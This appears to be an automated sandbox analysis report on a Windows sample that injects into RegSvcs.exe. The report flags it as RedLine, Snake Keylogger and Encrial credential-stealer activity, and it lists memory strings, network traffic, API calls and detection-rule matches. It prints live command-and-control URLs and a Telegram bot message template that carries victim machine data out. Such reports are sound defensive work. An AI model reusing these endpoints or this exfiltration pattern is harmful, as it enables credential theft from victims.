              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 06 Nov 2024 11:45:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/0
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.starfieldtech.com/repository/1402
              Source: RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-677.crl0c
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.starofseasmarine.com
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/08
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0;
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0F
              Source: RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.starfieldtech.com/repository/0
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RegSvcs.exe, 00000002.00000002.4475403957.0000000002802000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: RegSvcs.exe, 00000002.00000002.4475403957.0000000002802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enDzT
              Source: RegSvcs.exe, 00000002.00000002.4475403957.00000000027FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RegSvcs.exe, 00000002.00000002.4475403957.00000000026D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000002.00000002.4475403957.00000000026D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000002.00000002.4475403957.00000000026FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.80
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002743000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.00000000026FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.80$
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: RegSvcs.exe, 00000002.00000002.4475403957.0000000002833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: RegSvcs.exe, 00000002.00000002.4475403957.0000000002833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/DzT
              Source: RegSvcs.exe, 00000002.00000002.4475403957.000000000282E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBjq
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49771 version: TLS 1.2
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

              System Summary

              barindex
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0.2.NOAH $$$$.exe.2f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000000.00000002.2031225515.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.4473920648.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004096A00_2_004096A0
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0042200C0_2_0042200C
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0041A2170_2_0041A217
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004122160_2_00412216
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0042435D0_2_0042435D
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004033C00_2_004033C0
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044F4300_2_0044F430
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004125E80_2_004125E8
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044663B0_2_0044663B
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004138010_2_00413801
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0042096F0_2_0042096F
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004129D00_2_004129D0
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004119E30_2_004119E3
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0041C9AE0_2_0041C9AE
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0047EA6F0_2_0047EA6F
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0040FA100_2_0040FA10
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044EB5F0_2_0044EB5F
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00423C810_2_00423C81
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00411E780_2_00411E78
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00442E0C0_2_00442E0C
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00420EC00_2_00420EC0
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044CF170_2_0044CF17
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00444FD20_2_00444FD2
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_03FCD7280_2_03FCD728
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040DC112_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00407C3F2_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418CCC2_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00406CA02_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004028B02_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041A4BE2_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182442_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004016502_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F202_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004193C42_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004187882_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F892_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B902_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004073A02_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_020A12B22_2_020A12B2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_020A12C02_2_020A12C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_020A154F2_2_020A154F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_020A15602_2_020A1560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_025593182_2_02559318
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255B3002_2_0255B300
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255C1602_2_0255C160
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_025541E02_2_025541E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255C43F2_2_0255C43F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255B5E02_2_0255B5E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255BBA22_2_0255BBA2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_025558602_2_02555860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255B8C02_2_0255B8C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255D8902_2_0255D890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255AE582_2_0255AE58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255BEAA2_2_0255BEAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02555FA82_2_02555FA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255B0222_2_0255B022
